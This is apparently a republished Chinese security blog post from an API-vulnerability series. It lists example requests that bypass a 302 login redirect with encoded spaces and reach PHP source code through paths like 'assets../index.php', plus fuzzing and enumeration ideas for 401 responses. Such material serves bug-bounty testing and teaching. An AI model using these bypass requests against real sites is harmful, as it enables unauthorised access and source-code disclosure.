api漏洞系列-401、404和302
2024-9-28 23:27:36 Author: mp.weixin.qq.com(查看原文) 阅读量:23 收藏

api漏洞系列-401、404和302

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

302Bypass

~http://target.com/admin –> HTTP 302 (redirect to login page)
~http://target.com/admin%20/ -> HTTP 200 OK
~http://target.com/%20admin%20/ -> HTTP 200 OK
~http://target.com/admin%20/page -> HTTP 200 OK

404

http://example[.]com/index.php -> File not found
http://example[.].com/assets../index.php -> source code
http://example[.].com/img../index.php -> source code
http://example[.].com/js../index.php -> source code
http://example[.].com/vendors../index.php -> source code
http://example[.].com/media../index.php -> source code

401相关测试思路

1.文件枚举

2.通过搜索引擎来发现更多信息

3.在github上面搜索类似的域名

4.通过Wayback来搜索查找

5.改变HTTP的方法(get/post/put/delete/patch/...)

6.对cookies,参数,header,hosts,目录进行模糊测试

...

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

一款bp神器

ssrf绕过新思路

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247495975&idx=1&sn=db6b0aefc65adf02759bda48c194704a&chksm=e8a5fb44dfd272524f459cf590fed356305b2ccf497f563ac78e659b880aab93f3c688530cbb&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh